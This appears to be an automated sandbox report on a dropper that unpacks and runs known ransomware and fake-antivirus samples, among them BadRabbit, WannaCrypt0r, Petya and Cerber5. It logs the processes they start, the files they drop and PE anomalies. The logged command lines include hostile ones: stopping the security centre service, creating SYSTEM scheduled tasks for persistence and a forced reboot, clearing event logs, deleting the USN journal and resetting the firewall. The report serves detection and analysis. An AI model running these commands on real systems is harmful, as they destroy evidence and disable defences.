          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@AnViPC2009.exe "C:\Users\user\Desktop\Endermanch@AnViPC2009.exe" Jump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@BadRabbit.exe "C:\Users\user\Desktop\Endermanch@BadRabbit.exe" Jump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@Birele.exe "C:\Users\user\Desktop\Endermanch@Birele.exe" Jump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@Cerber5.exe "C:\Users\user\Desktop\Endermanch@Cerber5.exe" Jump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@DeriaLock.exe "C:\Users\user\Desktop\Endermanch@DeriaLock.exe" Jump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe "C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe" Jump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe "C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe" Jump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe "C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe" Jump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeProcess created: C:\Windows\302746537.exe "C:\WINDOWS\302746537.exe" Jump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeProcess created: C:\Program Files (x86)\antiviruspc2009\avpc2009.exe "C:\Program Files (x86)\antiviruspc2009\avpc2009.exe"
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
          Source: C:\Windows\302746537.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\A00.tmp\302746537.bat" "
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegal
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2277809790 && exit"
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:17:00
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\586F.tmp "C:\Windows\586F.tmp" \\.\pipe\{9D54B529-EEEC-45A5-9DC8-4D8B7F723465}
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall reset
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 /s c:\windows\comctl32.ocx
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 /s c:\windows\mscomctl.ocx
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\antivirus-platinum.exe c:\windows\antivirus-platinum.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h c:\windows\antivirus-platinum.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess created: C:\Users\user\AppData\Local\6AdwCleaner.exe "C:\Users\user\AppData\Local\6AdwCleaner.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2277809790 && exit"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:17:00
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\net.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 15_2_004034AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,15_2_004034AA
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 17_2_0040346B GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,17_2_0040346B
          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;explorer.exe&quot;)
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeFile created: C:\Users\user\AppData\Local\Temp\4otjesjty.mofJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 15_2_0040A9BD OleInitialize,CoCreateInstance,MultiByteToWideChar,OleUninitialize,15_2_0040A9BD
          Source: 07bb0738.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\07bb0738.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5596:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5292:120:WilError_01
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeMutant created: \Sessions\1\BaseNamedObjects\6e722db8-b319-4933-9932-314a077920be
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeMutant created: \Sessions\1\BaseNamedObjects\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flagMFCEJFAAMHGBAAAA
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5328:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3724:120:WilError_01
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeMutant created: \Sessions\1\BaseNamedObjects\shell.ipc.{18192125-9B0C-B8CE-4A82-18564590BB6A}
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4240:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5828:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1800:120:WilError_01
          Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\82577E283AD6FDE5
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4644:120:WilError_01
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeMutant created: \Sessions\1\BaseNamedObjects\avpc2009megamutex
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3576:120:WilError_01
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeMutant created: \Sessions\1\BaseNamedObjects\AntiVirus Pro 2017_MUTEX
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6916:120:WilError_01
          Source: Yara matchFile source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exe, type: DROPPED
          Source: C:\Users\user\Desktop\07bb0738.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeWindow found: window name: msctls_updown32Jump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeWindow detected: Number of UI elements: 16
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeWindow detected: Number of UI elements: 51
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeWindow detected: Number of UI elements: 34
          Source: C:\Windows\SysWOW64\regsvr32.exeKey value created or modified: HKEY_CURRENT_USER\Control Panel\Mouse MouseHoverTime
          Source: C:\Users\user\Desktop\07bb0738.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: 07bb0738.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 07bb0738.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: F:\Windows.old\Users\ArizonaCode\Documents\Visual Studio 2013\Projects\UI\UI\obj\Debug\UI.pdb source: Endermanch@InfinityCrypt.exe, 00000039.00000000.449968322.0000000000363000.00000002.00000001.01000000.00000026.sdmp, Endermanch@InfinityCrypt.exe.0.dr
          Source: Binary string: c:\Users\PresFox\Documents\Visual Studio 2013\Projects\AdwareBooC\AdwareBooC\obj\Release\AdwareBooC.pdb source: Endermanch@FakeAdwCleaner.exe, 00000023.00000002.450580371.0000000000409000.00000004.00000001.01000000.00000019.sdmp, 6AdwCleaner.exe, 00000036.00000000.446677741.0000000000A22000.00000002.00000001.01000000.00000025.sdmp
          Source: Binary string: F:\DESKTOP!\ChkDsk\ChkDsk\obj\Debug\PremiereCrack.pdb source: Endermanch@InfinityCrypt.exe, 00000039.00000000.451959592.0000000000382000.00000002.00000001.01000000.00000026.sdmp, Endermanch@InfinityCrypt.exe.0.dr
          Source: Binary string: e:\Working Copies\Bundles\Antivirus\Av\release\avt_main.pdb source: Endermanch@Antivirus.exe, 0000000E.00000000.354486231.00000000004AE000.00000002.00000001.01000000.00000008.sdmp
          Source: Binary string: C:\Users\Kyle\documents\visual studio 2010\Projects\HAPPY ANTIVIRUS\HAPPY ANTIVIRUS\obj\x86\Release\HAPPY ANTIVIRUS.pdb source: Endermanch@HappyAntivirus.exe, 00000028.00000000.429984473.0000000000DD8000.00000002.00000001.01000000.0000001B.sdmp
          Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb source: Endermanch@AntivirusPlatinum.exe, 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmp, Endermanch@AntivirusPlatinum.exe, 0000000F.00000000.359356779.0000000000412000.00000002.00000001.01000000.00000009.sdmp, Endermanch@AnViPC2009.exe, 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmp, Endermanch@AnViPC2009.exe, 00000011.00000000.372360269.0000000000412000.00000002.00000001.01000000.0000000D.sdmp
          Source: Binary string: C:\Users\Anton\Documents\Visual Studio 2013\Projects\p1_p2\Release\p2.pdb source: Endermanch@SecurityDefener2015.exe.0.dr
          Source: Binary string: .cld.cfg.ign.ftm.wdb.gdb.pdb.rmd.zmd.sdb.ldu.ldb.ndu.ndb.mdu.mdb.fp.hdu.hdb.db3.db2.dbcli_tgzload: Can't fdopen() descriptor %d, errno = %d source: avpc2009.exe, 0000001A.00000000.386279142.0000000000516000.00000002.00000001.01000000.00000015.sdmp
          Source: Binary string: C:\Users\Anton\Documents\Visual Studio 2013\Projects\p1_p2\Release\p2.pdb source: Endermanch@SecurityDefener2015.exe.0.dr
          Source: Binary string: C:\Windows.old\Users\ArizonaCode\Documents\Visual Studio 2013\Projects\LOGON\LOGON\obj\Debug\LOGON.pdb source: Endermanch@DeriaLock.exe, 0000001E.00000000.396026322.00000000008C2000.00000002.00000001.01000000.00000018.sdmp
          Source: Binary string: dcrypt.pdb source: rundll32.exe, 00000016.00000003.391522573.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.472917726.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000003.432023406.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000003.410488434.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 15_3_0068D366 push 3DBC1C00h; iretd 15_3_0068D36B
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 15_3_00690C71 push es; iretd 15_3_00690CE4
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 15_3_0068CE00 push ds; ret 15_3_0068CE84
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 15_3_0068D3C1 push D73FCF00h; iretd 15_3_0068D3DF
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 17_3_007ACAA9 pushad ; retf 17_3_007ACAC5
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 17_3_007ACAA9 pushad ; retf 17_3_007ACAC5
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 17_3_007B0041 push es; iretd 17_3_007B00B4
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 17_3_007ACAA9 pushad ; retf 17_3_007ACAC5
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 17_3_007ACAA9 pushad ; retf 17_3_007ACAC5
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 15_2_00411585 LoadLibraryA,LoadLibraryA,LoadLibraryA,#17,LoadLibraryA,GetProcAddress,FreeLibrary,SHGetMalloc,15_2_00411585
          Source: Endermanch@AntivirusPro2017.exe.0.drStatic PE information: section name: .data2
          Source: Endermanch@Movie.mpeg.exe.0.drStatic PE information: section name: .wdata
          Source: Endermanch@Movie.mpeg.exe.0.drStatic PE information: section name: .fdata
          Source: Endermanch@Movie.mpeg.exe.0.drStatic PE information: section name: .mdata
          Source: Endermanch@SE2011.exe.0.drStatic PE information: section name: .code
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name: .adata
          Source: Endermanch@Movie.mpeg.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x6d4ce
          Source: Endermanch@WannaCrypt0r.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x363012
          Source: Endermanch@HappyAntivirus.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1ed7f7
          Source: Endermanch@PolyRansom.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x4214c
          Source: Endermanch@AntivirusPro2017.exe.0.drStatic PE information: real checksum: 0x0 should be: 0xcfabb
          Source: Endermanch@PCDefender.exe.0.drStatic PE information: real checksum: 0x21337 should be: 0xe33fd
          Source: Endermanch@DeriaLock.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x82848
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x23c0c0
          Source: Endermanch@Xyeta.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x18075
          Source: Endermanch@AntivirusPlatinum.exe.0.drStatic PE information: real checksum: 0x21337 should be: 0xc4420
          Source: Endermanch@InternetSecurityGuard.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x62e80b
          Source: Endermanch@NavaShield.exe.0.drStatic PE information: real checksum: 0x81831 should be: 0x9bc9b7
          Source: Endermanch@ViraLock.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x3a0f8
          Source: Endermanch@WinlockerVB6Blacksod.exe.0.drStatic PE information: real checksum: 0x1676f6 should be: 0x26f735
          Source: Endermanch@VAV2008.exe.0.drStatic PE information: real checksum: 0x0 should be: 0xc7a3e
          Source: Endermanch@NoMoreRansom.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1624e8
          Source: Endermanch@Krotten.exe.0.drStatic PE information: real checksum: 0x13aae should be: 0xee00
          Source: Endermanch@Antivirus.exe.0.drStatic PE information: real checksum: 0x200061 should be: 0x206fc7
          Source: 07bb0738.exeStatic PE information: real checksum: 0x0 should be: 0x2e388
          Source: Endermanch@InfinityCrypt.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x3cd67
          Source: Endermanch@Birele.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x22594
          Source: Endermanch@SecurityDefender.exe.0.drStatic PE information: real checksum: 0x1797c0 should be: 0x1762de
          Source: Endermanch@SE2011.exe.0.drStatic PE information: real checksum: 0x271eac should be: 0x26a7fe
          Source: Endermanch@SmartDefragmenter.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x789b3
          Source: Endermanch@LPS2019.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x12a4ca
          Source: Fantom.exe.0.drStatic PE information: real checksum: 0x23bfb should be: 0x42811
          Source: Endermanch@SecurityDefener2015.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x137242
          Source: Endermanch@AnViPC2009.exe.0.drStatic PE information: real checksum: 0x236e4 should be: 0x12f8ba
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\__tmp_rar_sfx_access_check_19404687Jump to behavior
          Source: initial sampleStatic PE information: section name: .text entropy: 7.959499048197106
          Source: initial sampleStatic PE information: section name: .text entropy: 7.3467930766155956
          Source: initial sampleStatic PE information: section name: .text entropy: 7.193641199482148
          Source: initial sampleStatic PE information: section name: .text entropy: 7.995168937044817
          Source: initial sampleStatic PE information: section name: .text entropy: 7.848405878864468
          Source: initial sampleStatic PE information: section name: .text entropy: 7.914448567969065
          Source: initial sampleStatic PE information: section name: entropy: 7.9958918474030645
          Source: initial sampleStatic PE information: section name: entropy: 7.994235618092612
          Source: initial sampleStatic PE information: section name: entropy: 7.636979274606437
          Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.996124045562077
          Source: initial sampleStatic PE information: section name: .data entropy: 7.737096645949357
          Source: initial sampleStatic PE information: section name: UPX0
          Source: initial sampleStatic PE information: section name: UPX1
          Source: initial sampleStatic PE information: section name: UPX0
          Source: initial sampleStatic PE information: section name: UPX1
          Source: initial sampleStatic PE information: section name: UPX0
          Source: initial sampleStatic PE information: section name: UPX1

          Persistence and Installation Behavior

          barindex
          Source: C:\Windows\SysWOW64\rundll32.exeExecutable created and started: C:\Windows\586F.tmp
          Source: C:\Windows\SysWOW64\cmd.exeExecutable created and started: C:\Windows\antivirus-platinum.exe
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeExecutable created and started: C:\Windows\302746537.exeJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@BadRabbit.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@ViraLock.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@SecurityDefender.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@SE2011.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeFile created: C:\Program Files (x86)\antiviruspc2009\bzip2.dllJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@Xyeta.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@Petya.A.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\MSCOMCTL.OCXJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeFile created: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Fantom.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@SecurityCentral.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@SecurityScanner.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@NoMoreRansom.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\cscc.datJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\302746537.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@WinlockerVB6Blacksod.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@Cerber5.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@PolyRansom.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@RegistrySmart.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@Antivirus.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\COMCTL32.OCXJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@Birele.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@PCDefender.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@LPS2019.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeFile created: C:\Users\user\AppData\Local\6AdwCleaner.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\antivirus-platinum.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@NavaShield.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@VAV2008.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@DeriaLock.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@SmartDefragmenter.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeFile created: C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dllJump to dropped file
